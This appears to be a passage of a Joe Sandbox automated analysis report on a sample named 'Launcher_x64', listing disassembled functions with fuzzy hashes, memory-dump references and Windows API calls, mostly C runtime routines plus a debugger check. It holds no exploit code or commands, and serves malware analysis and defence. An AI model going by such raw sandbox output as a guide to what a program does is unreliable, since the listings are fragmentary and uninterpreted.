                                                                                          • Opcode Fuzzy Hash: 848afbc038789c983303edabf5c9d1e30fb8589e26ef94b0d315bef32108477d
                                                                                          • Instruction Fuzzy Hash: CA51E1726052069FDB2A9F14D881BBAB7A8EF00311F28852DE94D57291F731EC40CBB0
                                                                                          APIs
                                                                                            • Part of subcall function 00D75801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D76FD5,?,00000000,-00000008), ref: 00D75862
                                                                                          • GetLastError.KERNEL32 ref: 00D7B5DA
                                                                                          • __dosmaperr.LIBCMT ref: 00D7B5E1
                                                                                          • GetLastError.KERNEL32 ref: 00D7B61B
                                                                                          • __dosmaperr.LIBCMT ref: 00D7B622
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                          • String ID:
                                                                                          • API String ID: 1913693674-0
                                                                                          • Opcode ID: 8eb4edbe76670798437dfbf930815999119a8a0f2cbb98fb73e2dabb95d2fb38
                                                                                          • Instruction ID: d4b44ea25cc552eb20b3df6f088d9fcb9b0824aeefc29bb11e34a425429153d1
                                                                                          • Opcode Fuzzy Hash: 8eb4edbe76670798437dfbf930815999119a8a0f2cbb98fb73e2dabb95d2fb38
                                                                                          • Instruction Fuzzy Hash: 2A218B71600609AFDB20AF66C881AAFB7A9EF45374714C51AF95DDB650F731EC408BB0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d30bc071266a8cad1919b614ec4cdf2d44186c2b649272c0e64d176e2285040d
                                                                                          • Instruction ID: a811b07d9530e115a03181b21f363b3c03ba9f0b37973264c242461864e21def
                                                                                          • Opcode Fuzzy Hash: d30bc071266a8cad1919b614ec4cdf2d44186c2b649272c0e64d176e2285040d
                                                                                          • Instruction Fuzzy Hash: 9C21C032220209AFDB21EFB5DC8197A77A8EF403687149619F899C7650F730EC40DBB0
                                                                                          APIs
                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 00D7C976
                                                                                            • Part of subcall function 00D75801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D76FD5,?,00000000,-00000008), ref: 00D75862
                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D7C9AE
                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D7C9CE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                          • String ID:
                                                                                          • API String ID: 158306478-0
                                                                                          • Opcode ID: ae46516e1912554e375e61fb6f2345ffcedf139e13d0cad184e2ad71d714f4de
                                                                                          • Instruction ID: e6265269a883aea9115264ad3c363539889014eab3446e5dbe2a423df1cd5f94
                                                                                          • Opcode Fuzzy Hash: ae46516e1912554e375e61fb6f2345ffcedf139e13d0cad184e2ad71d714f4de
                                                                                          • Instruction Fuzzy Hash: 1D1126F29216097F6B1167766C8DC7F6AACDF843D53908018F90DD1200FB70CD008AB2
                                                                                          APIs
                                                                                          • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00D839DF,00000000,00000001,?,?,?,00D7DB40,?,00000000,00000000), ref: 00D844A7
                                                                                          • GetLastError.KERNEL32(?,00D839DF,00000000,00000001,?,?,?,00D7DB40,?,00000000,00000000,?,?,?,00D7D486,?), ref: 00D844B3
                                                                                            • Part of subcall function 00D84510: CloseHandle.KERNEL32(FFFFFFFE,00D844C3,?,00D839DF,00000000,00000001,?,?,?,00D7DB40,?,00000000,00000000,?,?), ref: 00D84520
                                                                                          • ___initconout.LIBCMT ref: 00D844C3
                                                                                            • Part of subcall function 00D844E5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00D84481,00D839CC,?,?,00D7DB40,?,00000000,00000000,?), ref: 00D844F8
                                                                                          • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00D839DF,00000000,00000001,?,?,?,00D7DB40,?,00000000,00000000,?), ref: 00D844D8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                          • String ID:
                                                                                          • API String ID: 2744216297-0
                                                                                          • Opcode ID: 8a48b0bb40f6d25b78cd578845cde7adcf9e030f59df84cf40782a228af6da3a
                                                                                          • Instruction ID: 255697b9578e0053e714db808193c1074dad779bc5115dae3d3d3dd2f230679c
                                                                                          • Opcode Fuzzy Hash: 8a48b0bb40f6d25b78cd578845cde7adcf9e030f59df84cf40782a228af6da3a
                                                                                          • Instruction Fuzzy Hash: A8F0303A011226BBCF223FD5EC09A8E3F26FB493B0B054450FA18C5230D67288209FB4
                                                                                          APIs
                                                                                            • Part of subcall function 00D7594A: GetLastError.KERNEL32(00000000,?,00D77CCD), ref: 00D7594E
                                                                                            • Part of subcall function 00D7594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D71F93), ref: 00D759F0
                                                                                          • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00D6F809,?,?,?,00000055,?,-00000050,?,?,?), ref: 00D7A1E5
                                                                                          • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00D6F809,?,?,?,00000055,?,-00000050,?,?), ref: 00D7A21C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$CodePageValid
                                                                                          • String ID: utf8
                                                                                          • API String ID: 943130320-905460609
                                                                                          • Opcode ID: a116b71e8fe4b5fff891a44014fb931d777c88096c36ffc4a42583c2ac4f491c
                                                                                          • Instruction ID: 45e9dde6864d156daa931f39507cda29745fcfc84825e2ad5fb95e333a7672ee
                                                                                          • Opcode Fuzzy Hash: a116b71e8fe4b5fff891a44014fb931d777c88096c36ffc4a42583c2ac4f491c
                                                                                          • Instruction Fuzzy Hash: 0851D771600705AAE725AFB8CC42BBE73A8EF85711F58842AF94D97181F670ED408B77
                                                                                          APIs
                                                                                          • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00D75071,?,?,00000000,00000000,00000000,?), ref: 00D75195
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: EncodePointer
                                                                                          • String ID: MOC$RCC
                                                                                          • API String ID: 2118026453-2084237596
                                                                                          • Opcode ID: 0fec9516253b5116a0742f4f54cc233897fe926708235a6ae1ca10f8eec6740d
                                                                                          • Instruction ID: b2b1ce5d5b8987740502310ad79eea20e904598d273e9f3bc3b8aa4d257547ae
                                                                                          • Opcode Fuzzy Hash: 0fec9516253b5116a0742f4f54cc233897fe926708235a6ae1ca10f8eec6740d
                                                                                          • Instruction Fuzzy Hash: DF41AC31900609EFCF15CF98DC81AEEBBB5FF08304F188199F90867216E3B1A950DB66
                                                                                          APIs
                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00D74C53
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: ___except_validate_context_record
                                                                                          • String ID: csm$csm
                                                                                          • API String ID: 3493665558-3733052814
                                                                                          • Opcode ID: 829149afb84b4b40d40af062cf2d3c96ac86b07a01a29663beb594334454e875
                                                                                          • Instruction ID: b1b73bbb8a89f5abeca551d8b4f9a146d04717acd18eae032022585d67f9b0e0
                                                                                          • Opcode Fuzzy Hash: 829149afb84b4b40d40af062cf2d3c96ac86b07a01a29663beb594334454e875
                                                                                          • Instruction Fuzzy Hash: 2531B032501218EBCF379F58C8459AA7B66FF09315B19C65AFC9C4A121E332CCA1DBB1
                                                                                          APIs
                                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,00D7AB6D,00000002,00000000,?,?,?,00D7AB6D,?,00000000), ref: 00D7B250
                                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,00D7AB6D,00000002,00000000,?,?,?,00D7AB6D,?,00000000), ref: 00D7B279
                                                                                          • GetACP.KERNEL32(?,?,00D7AB6D,?,00000000), ref: 00D7B28E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoLocale
                                                                                          • String ID: ACP$OCP
                                                                                          • API String ID: 2299586839-711371036
                                                                                          • Opcode ID: 104557e406e8af8b90e8928730565bc8c50f6d6dd59493b34bc93898e2328cd0
                                                                                          • Instruction ID: ad49d30e01a4e4d86c5439c32d2d6f1389a12d6cb51c74148564451106975f2d
                                                                                          • Opcode Fuzzy Hash: 104557e406e8af8b90e8928730565bc8c50f6d6dd59493b34bc93898e2328cd0
                                                                                          • Instruction Fuzzy Hash: 1021C422A02100AADB348F54C805B9F73A7AF54B34B5AC026E80EDB216F732DD40C778
                                                                                          APIs
                                                                                            • Part of subcall function 00D7594A: GetLastError.KERNEL32(00000000,?,00D77CCD), ref: 00D7594E
                                                                                            • Part of subcall function 00D7594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D71F93), ref: 00D759F0
                                                                                          • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00D7AB3F
                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 00D7AB7D
                                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 00D7AB90
                                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00D7ABD8
                                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00D7ABF3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                          • String ID:
                                                                                          • API String ID: 415426439-0
                                                                                          • Opcode ID: bf0a0a2bea6dc38dd9371567bda3d378ebbffd9b2a44813376714506e90dcd0a
                                                                                          • Instruction ID: e06a8d4d02587f620353ddd69fedfa8a7e3d78e66bc80585e358d1a7ec63fff4
                                                                                          • Opcode Fuzzy Hash: bf0a0a2bea6dc38dd9371567bda3d378ebbffd9b2a44813376714506e90dcd0a
                                                                                          • Instruction Fuzzy Hash: 3A5171B1A00219AFDB11DFA8CC45ABE73B9EF84700F088569E908E7191F770D944CB72
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
                                                                                          • Instruction ID: e11eecbea5574055480e474f930a62a5d8ea565e96ba689ed594bd4078c99adf
                                                                                          • Opcode Fuzzy Hash: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
                                                                                          • Instruction Fuzzy Hash: EC022EB1E012199BDF14CFA9C8806AEFBF1FF48314F148269E519E7341E731AA45DBA0
                                                                                          APIs
                                                                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D7B889
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileFindFirst
                                                                                          • String ID:
                                                                                          • API String ID: 1974802433-0
                                                                                          • Opcode ID: 549cea7732a3910a054da503e428a285a943a59f242e259efbcf39884d14e04e
                                                                                          • Instruction ID: 2d3d9e401ec0b220937be106588e4fa27c6fbc05bbfd1855c9caed4842c165b3
                                                                                          • Opcode Fuzzy Hash: 549cea7732a3910a054da503e428a285a943a59f242e259efbcf39884d14e04e
                                                                                          • Instruction Fuzzy Hash: B071B371905158AFDF20AF289C89BAEB7B8EF45310F5881DAE54DA7211FB314E849F70
                                                                                          APIs
                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00D69A7F
                                                                                          • IsDebuggerPresent.KERNEL32 ref: 00D69B4B
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D69B64
                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00D69B6E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                          • String ID:
                                                                                          • API String ID: 254469556-0
                                                                                          • Opcode ID: cbe7d31c04a57894dee06fb981df5a72526c8d01320c22f0f82a803aafe69e3d
                                                                                          • Instruction ID: 7fdec92870f0d2781a78abc8879858e6f38e773c036cc1ab135d9c4411f21d82
                                                                                          • Opcode Fuzzy Hash: cbe7d31c04a57894dee06fb981df5a72526c8d01320c22f0f82a803aafe69e3d
                                                                                          • Instruction Fuzzy Hash: 9A31D775D053199BDB21EFA4D949BCDBBF8AF48300F1041EAE40DAB250EB719A848F55
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressCloseFileHandleProcSize
                                                                                          • String ID: CreateFileA
                                                                                          • API String ID: 2836222988-1429953656
                                                                                          • Opcode ID: 0bf27c55d3e56102971c61d26ac3a9174ae89d64dec7ab4c08b77edd9f442afb
                                                                                          • Instruction ID: 91d4f7fd6afe5d3ee9a9cae4db60e339a0621f2ccba58caf3f873401b70d58e1
                                                                                          • Opcode Fuzzy Hash: 0bf27c55d3e56102971c61d26ac3a9174ae89d64dec7ab4c08b77edd9f442afb
                                                                                          • Instruction Fuzzy Hash: 844194B4D083099FDB00EFA8D4586AEBBF0EF49314F048529E899A7350D7789545CFA2
                                                                                          APIs
                                                                                          • GetCPInfo.KERNEL32(00000000,00000000,00000000,7FFFFFFF,?,00D841BD,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 00D84278
                                                                                          • __alloca_probe_16.LIBCMT ref: 00D84333
                                                                                          • __alloca_probe_16.LIBCMT ref: 00D843C2
                                                                                          • __freea.LIBCMT ref: 00D8440D
                                                                                          • __freea.LIBCMT ref: 00D84413
                                                                                          • __freea.LIBCMT ref: 00D84449
                                                                                          • __freea.LIBCMT ref: 00D8444F
                                                                                          • __freea.LIBCMT ref: 00D8445F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: __freea$__alloca_probe_16$Info
                                                                                          • String ID:
                                                                                          • API String ID: 127012223-0
                                                                                          • Opcode ID: c1ca8deeccd68d50247960c7d48acd449f55208c01de866e9b8b7913a48996ad
                                                                                          • Instruction ID: 49a35b566737594274ff105722d898b4ce4c5f8dac78fe18e3ada44ba398b050
                                                                                          • Opcode Fuzzy Hash: c1ca8deeccd68d50247960c7d48acd449f55208c01de866e9b8b7913a48996ad
                                                                                          • Instruction Fuzzy Hash: A371E27290424BABDF20BF98CC52BAE7BB9EF45314F294059F914B7281E6B5DC0087B4
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: _strrchr
                                                                                          • String ID:
                                                                                          • API String ID: 3213747228-0
                                                                                          • Opcode ID: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
                                                                                          • Instruction ID: 934878f86550f09cd9263c6ed98f554efb05fbd23718919bf43427b62466e413
                                                                                          • Opcode Fuzzy Hash: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
                                                                                          • Instruction Fuzzy Hash: BAB15972E40355AFDB158F28CC85BAEBBA5EF55310F288155E809AF282FA70D901D7B1
                                                                                          APIs
                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00D6ABE7
                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00D6ABEF
                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00D6AC78
                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00D6ACA3
                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00D6ACF8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
